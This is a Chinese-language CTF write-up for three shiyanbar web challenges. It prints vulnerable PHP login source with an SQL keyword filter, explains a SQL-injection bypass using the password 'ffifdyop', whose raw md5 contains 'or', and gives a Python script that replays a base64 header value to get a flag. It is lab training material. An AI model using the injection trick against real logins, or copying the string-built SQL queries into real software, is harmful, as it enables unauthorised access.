简单的登录题
解题链接: [http://ctf5.shiyanbar.com/web/jiandan/index.php](javascript:;)
-
响应头提示:tips:test.php或者用御剑也可以扫出来:
define("SECRET_KEY", '***********');
define("METHOD", "aes-128-cbc");
error_reporting(0); include('conn.php');
function sqliCheck($str){
if(preg_match("/\\\|,|-|#|=|~|union|like|procedure/i",$str)){
return 1;
}
return 0; }
function get_random_iv(){
$random_iv=''; for($i=0;$i<16;$i++){
$random_iv.=chr(rand(1,255)); }
return $random_iv; }
function login($info){
$iv = get_random_iv();
$plain = serialize($info);
$cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
setcookie("iv", base64_encode($iv));
setcookie("cipher", base64_encode($cipher)); }
function show_homepage(){
global $link; if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
$cipher = base64_decode($_COOKIE['cipher']);
$iv = base64_decode($_COOKIE["iv"]);
if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){
$info = unserialize($plain) or die("
base64_decode('".base64_encode($plain)."') can't unserialize
");
$sql="select * from users limit ".$info['id'].",0";
$result=mysqli_query($link,$sql); if(mysqli_num_rows($result)>0 or die(mysqli_error($link))){
$rows=mysqli_fetch_array($result); echo '
Hello!'.$rows['username'].'
'; } else{ echo '
Hello!
'; } }else{ die("ERROR!"); } } } if(isset($_POST['id'])){
$id = (string)$_POST['id'];
if(sqliCheck($id))
die("
sql inject detected!
");
$info = array('id'=>$id); login($info); echo '
Hello!
'; }else{
if(isset($_COOKIE["iv"])&&isset($_COOKIE['cipher'])){
show_homepage(); }else{
echo '
Login Form
input id to login
'; } }
- 关键语句:
- sql语句:
$sql="select * from users limit ".$info['id'].",0"; - 正则匹配:
preg_match("/\\\|,|-|#|=|~|union|like|procedure/i",$str)
- 未完待续。。。
后台登录
解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php
- 源码:
<!-- $password=$_POST['password'];
$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";
$result=mysqli_query($link,$sql);
if(mysqli_num_rows($result)>0){
echo 'flag is :'.$flag;
}
else{
echo '密码错误!';
} -->
- post的密码要md5($password,true):
md5(string, raw):
raw 可选,默认为false
true:返回16字符2进制格式
false:返回32字符16进制格式
简单来说就是 true将16进制的md5转化为字符了
思路:md5(string,true)='or'****,则可以注入了
看url:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php
md5(ffifdyop)(32字符16进制):276f722736c95d99e921722cf9ed621c
利用16进制转字符
md5(ffifdyop)(字符): 'or'6�]��!r,��b�(看别人的writeup是'or'6<trash>)
后面出现乱码,不过,没关系,有'or'就行。将ffifdyop作为密码输入即可,sql语句变成了
SELECT * FROM admin WHERE username = 'admin' and password = ''or'6�]��!r,��b�'-
or 后面的'6�]��!r,��b�'为真。
flag{ffifdyop_has_trash}
天下武功唯快不破
看看响应头
http://ctf5.shiyanbar.com/web/10/10.php
- 页面显示:
There is no martial art is indefectible, while the fastest speed is the only way for long success.
>>>>>>----You must do it as fast as you can!----<<<<<< -
响应头
head.png - 有个FLAG,base64加密了,解密之后:
P0ST_THIS_T0_CH4NGE_FL4G:o3DLpyFV4 - 每次flag都会变,写python脚本:
import requests
import base64
url="http://ctf5.shiyanbar.com/web/10/10.php"
s=requests.Session()
response=s.get(url)
head=response.headers
print(head)
flag_1=str(base64.b64decode(head['flag']),encoding = "utf-8")
#base64解密之后是byte类型,要用str(a,encoding="utf-8"),转换成string类型,用于split()
flag=flag_1.split(':')[1]
print(flag)
postdata={'key':flag}#这里为什么是key参数,试出来的
result=s.post(url=url,data=postdata)
print(result.text)
- 运行结果
{'Server': 'Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29', 'Content-Length': '216', 'Date': 'Sun, 28 Jan 2018 09:04:09 GMT', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html', 'X-Powered-By': 'PHP/5.3.29', 'Keep-Alive': 'timeout=5, max=100', 'FLAG': 'UDBTVF9USElTX1QwX0NINE5HRV9GTDRHOklGQ09zOGVjdw=='}
IFCOs8ecw
CTF{Y0U_4R3_1NCR3D1BL3_F4ST!}
[Finished in 19.0s] - CTF{Y0U_4R3_1NCR3D1BL3_F4ST!}
